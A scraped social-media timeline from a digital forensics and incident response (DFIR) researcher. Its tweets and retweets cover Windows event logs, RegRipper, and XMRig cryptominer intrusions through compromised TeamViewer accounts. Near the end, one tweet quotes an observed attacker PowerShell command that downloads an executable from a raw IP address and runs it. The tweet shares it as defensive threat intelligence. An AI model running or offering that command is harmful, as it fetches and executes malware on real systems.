Sr DFIR Advisor, Researcher, Practitioner. USMC vet. Author. Opinions = own. linktr.ee/keydet89 #IntrusionIntel #IObviateCompliance @HuntressLabs
Planet Earth
Joined June 2017
- Tweets 13,569
- Following 57
- Followers 5,146
- Likes 1,305
Pinned Tweet
Pretty fascinating: bitsadm.in/blog/spying-on-us…
Wrote a plugin for the pro version of RegRipper in Feb.
1
12
It's Monday.
Don't stop believin'
inv.warpnine.de/watch?v=uOJoOtk7…
@ThatKevinSmith
Validating, We can see the following EventIDs in system.evtx which suggests the driver was blocked subsequently leading the service to fail
EventID: 7045 - Service Installation
EventID: 875 - known bad driver blocked from loading
EventID: 7000 - Service Start Failure
1
3
23
loldrivers.io/drivers/57fc51…
windowsir.blogspot.com/2023/… - 3 part series highly recommend reading from @keydet89
3
1
19
It's that time of year, folks...people getting too close to wild animals at our state parks.
Is getting that pic worth a hospital visit? Or worse, a calf being euthanized after it was rejected by the herd b/c you touched it?
Harbulary Battery retweeted
Join Harlan Carvey (@keydet89) and Ethan Tancredi for this month's episode of #TradecraftTuesday, where they'll cover what an asset inventory is and the importance of having an accurate, up-to-date inventory. hubs.ly/Q01RMySF0
#DFIR
1
1
Harbulary Battery retweeted
Fantastic blog post documenting the findings of an investigation lead by fellow UK analyst @f0xtrot_sierra
At the end of May 2023, Huntress saw an up-tick in compromised TeamViewer accounts being used to install the XMRig cryptocurrency miner.
Head over to our blog to hear more from our ThreatOps Center (TOC) analysts on how this threat was handled: hubs.ly/Q01RDp070
3
11
Harbulary Battery retweeted
Excellent work from my Huntress colleagues covering illicit cryptominer deployment via RMM application abuse:
huntress.com/blog/threat-adv…
9
18
Harbulary Battery retweeted
We've seen an uptick in XMRig here at @HuntressLabs lately, in particular being used via TeamViewer
#DFIR #CryptoMining #malware #MDR #EDR
New @HuntressLabs Threat Advisory just hit the streets:
huntress.com/blog/threat-adv…
3
5
New @HuntressLabs Threat Advisory just hit the streets:
huntress.com/blog/threat-adv…
3
8
2
19
Posted this to LinkedIn yesterday:
windowsir.blogspot.com/2023/…
Got a "like" from a "DFIR Expert", not due to content, but for the graphic.
Why do I even bother??
1
1
The sad part is, the posh600.pl plugin reconstructed the PowerShell commands from the deleted batch file.
1. Batch file downloaded, run, and deleted.
2. TA makes heavy use of PowerShell
3. Powershell from deleted batch file reconstructed.
1
Recent XMRig activity at @HuntressLabs /@Purp1eW0lf
Legit TeamViewer compromised, PowerShell commands via the clipboard to download nssm and xmrig.
nssm writes to Application.evtx <- Noice!
1
3
Looking at TeamViewer logs...is there a way to get the IP address of the remote system that connected to TeamViewer_Services and launched TeamViewer_Desktop?
2
3
4
Harbulary Battery retweeted
Are you attending the @ninjaone ITX Security Summit? Huntress is! Harlan Carvey will be speaking on a panel discussing defending against initial access and @_JohnHammond will be playing a session of Backdoors and Breaches. hubs.ly/Q01PJ7dq0
1
7
Friday's are always fun in #DFIR...
Seen several times this week:
powershell.exe Invoke-WebRequest http://103.253.43.5:30580/veems.exe -OutFile C:\ProgramData\vems.exe;C:\ProgramData\vems.exe
sqlservr.exe -> cmd.exe -> powershell.exe
/1
4
4
19
Some thoughts on SOC/DFIR analyst validation of findings:
windowsir.blogspot.com/2023/…
2
19
60